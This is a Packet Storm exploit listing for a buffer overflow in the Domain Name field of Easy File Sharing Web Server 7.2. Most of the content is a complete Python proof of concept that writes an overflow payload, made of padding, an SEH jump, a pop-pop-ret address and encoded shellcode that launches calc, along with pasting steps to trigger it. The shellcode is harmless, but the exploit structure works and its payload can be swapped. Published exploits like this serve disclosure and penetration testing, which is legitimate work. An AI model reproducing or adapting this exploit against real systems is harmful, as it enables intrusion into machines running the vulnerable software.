what you don't know can hurt you

Easy File Sharing Web Server 7.2 Domain Name Buffer Overflow

Easy File Sharing Web Server 7.2 Domain Name Buffer Overflow
Posted Oct 5, 2018
Authored by ZwX

Easy File Sharing Web Server version 7.2 suffers from a domain name buffer overflow vulnerability.

tags | exploit, web, overflow
MD5 | 0d3cc7fc1bb84f794d1756a2f00f68bd

Easy File Sharing Web Server 7.2 Domain Name Buffer Overflow

Change Mirror Download
#--------------------------------------------------------#
#Exploit Title: Easy File Sharing Web Server 7.2 - 'Domain Name' Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-09-19
#Vendor Homepage : http://www.sharing-file.com/
#Link Software : http://www.sharing-file.com/efssetup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/
#--------------------------------------------------------#

'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.


Proof of Concept (PoC):
=======================
The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Easy File Sharing Web Server
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Click User Account -> Active Directory -> Add Domain -> Domain Name (Input)"
4.Paste the contents of the file (poc.txt) into the input "Domain Name" and click "OK"
5.Now the calculator executes!
'''

#!/usr/bin/python

from struct import pack

buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close